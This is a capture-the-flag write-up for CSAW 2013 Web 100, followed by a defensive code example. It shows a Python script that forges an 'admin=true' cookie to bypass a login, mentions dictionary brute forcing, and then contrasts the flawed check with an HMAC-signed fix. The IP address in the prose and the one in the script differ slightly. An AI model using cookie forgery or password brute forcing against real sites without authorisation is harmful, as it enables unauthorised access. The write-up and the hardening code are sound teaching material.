CSAW CTF 2013 - WEB 100 "Guess Harder"
So there's no way for anybody to play around with WEB100 "Guess Harder" after the fact since the challenge web server is shut down. The challenge provided an IP address - http://128.238.66.215 - which showed a short message to the effect of "HA! Bet you can't guess my password.", included a text box, and a submit button. When you guess wrong, the page just recycles.
Admittedly, I did this one the hard way at first by scripting a brute force routine with Python that cycled through all the entries of a password dictionary. That thing ran for a long time and produced nothing, so I finally opened up Wireshark to take a peek. Lo and behold, within the HTTP header was a field COOKIE: admin=false. Could it be that easy?
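import http.client
import urllib.parse

# Form body: any password value; the cookie is the part that gets changed
params = urllib.parse.urlencode({'password': 'password'})
# Send admin=true in place of the admin=false cookie seen in the capture
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": "admin=true"}
conn = http.client.HTTPConnection("128.238.66.225:80")
conn.request("POST", "/", params, headers)
response = conn.getresponse()
# Print the status line and the response body, which carried the flag
print(response.status, response.reason, response.read().decode(errors="replace"))
conn.close()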
Yup. Just telling the server admin=true in the cookie field made it accept the entry and it provided the necessary flag.
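The flaw behind this challenge is a server that treats a client-supplied cookie as the authorization decision. The following is an added example, not code from the challenge or from this write-up's author: it puts that check next to a hardened one that only accepts an admin claim carrying a valid server-side HMAC tag. The function names, the `value.tag` cookie layout and `SERVER_KEY` are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# Constructed server-side secret (assumption); a real service loads it from protected config.
SERVER_KEY = secrets.token_bytes(32)


def parse_cookie(header, name):
    """Return the named cookie's value from a raw Cookie header, or None."""
    jar = SimpleCookie()
    jar.load(header)
    return jar[name].value if name in jar else None


def is_admin_vulnerable(cookie_header):
    """Flawed pattern: whatever the client sends is taken as the decision."""
    return parse_cookie(cookie_header, "admin") == "true"


def _tag(value, key):
    """HMAC-SHA256 over the cookie name and value, hex encoded."""
    return hmac.new(key, b"admin=" + value.encode(), hashlib.sha256).hexdigest()


def issue_cookie(is_admin, key=SERVER_KEY):
    """Server-issued cookie in the hypothetical layout admin=<value>.<tag>."""
    value = "true" if is_admin else "false"
    return f"admin={value}.{_tag(value, key)}"


def is_admin_hardened(cookie_header, key=SERVER_KEY):
    """Accept the admin claim only if its tag verifies under the server key."""
    raw = parse_cookie(cookie_header, "admin")
    if raw is None or "." not in raw:
        return False  # bare admin=true has no tag and is rejected
    value, tag = raw.rsplit(".", 1)
    # Constant-time comparison on bytes avoids timing leaks and non-ASCII errors
    valid = hmac.compare_digest(tag.encode(), _tag(value, key).encode())
    return valid and value == "true"
```

Keeping the role in server-side session state, keyed by a random session ID, avoids putting the decision in the cookie at all.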